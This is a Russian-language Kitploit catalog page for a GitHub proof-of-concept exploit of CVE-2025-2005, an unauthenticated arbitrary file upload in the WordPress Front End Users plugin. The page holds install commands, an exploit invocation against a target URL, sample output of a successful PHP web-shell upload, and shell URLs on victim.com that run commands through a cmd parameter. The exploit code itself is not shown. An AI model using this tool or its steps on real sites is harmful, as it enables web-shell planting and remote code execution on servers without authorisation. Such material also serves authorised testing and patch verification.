Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/mrmtwoj/cve-2025-2005
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubmrmtwoj/cve-2025-2005

CVE-2025-2005

WordPress FEUP Arbitrary File Upload Exploit (CVE-2025-2005)

Репозиторий
311 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Сайт

Эксплойт произвольной загрузки файлов WordPress FEUP (CVE-2025-2005)

Этот репозиторий содержит PoC-эксплойт для плагина WordPress Front End Users (версии до 3.2.32), уязвимого к произвольной загрузке файлов из-за отсутствия проверки MIME/типа файла в форме регистрации. Это позволяет неаутентифицированным злоумышленникам загружать вредоносные файлы (например, веб-шеллы), что потенциально может привести к удаленному выполнению кода (RCE) на сервере.

Возможности

  • CVE-2025-2005: Уязвимость загрузки файлов плагина WordPress Front End Users
  • Простой интерфейс командной строки
  • Автоматическое обнаружение форм регистрации
  • Загрузчик шелла с настраиваемым именем пользователя/паролем

Как это работает

  • Отправляет запрос на регистрацию в уязвимую форму FEUP.
  • Загружает PHP-шелл через поле ввода файла, обходя ограничения по типу файла.
  • Отображает статус загрузки и сообщает, уязвим ли сайт.

Цели тестирования

  • Ищет формы регистрации, содержащие:
  • ewd-feup-register-form
  • На URL-адресах, таких как:
root@kitploit:~
/register/
/signup/
  • или любую ссылку, найденную на главной странице

Начало работы

  • Python 3.x
  • модули requests и beautifulsoup4:
root@kitploit:~
pip install requests beautifulsoup4

Установка

root@kitploit:~
https://github.com/mrmtwoj/CVE-2025-2005.git
cd CVE-2025-2005

Использование

root@kitploit:~
python3 exploit.py --url http://target.com --user hacker --password pass123

Пример вывода

root@kitploit:~
[*] Scanning site: http://victim.com
[*] Found 17 pages.
[+] Registration form found at: http://victim.com/register
[*] Uploading shell...
[+] Shell uploaded successfully!

Запуск эксплойта

root@kitploit:~
Location ::
http://victim.com/wp-content/uploads/shell.php
http://victim.com/wp-content/uploads/ewd-feup-user-uploads/shell.php
RUN ::
http://victim.com/wp-content/uploads/shell.php?cmd=whoami
Скачать инструмент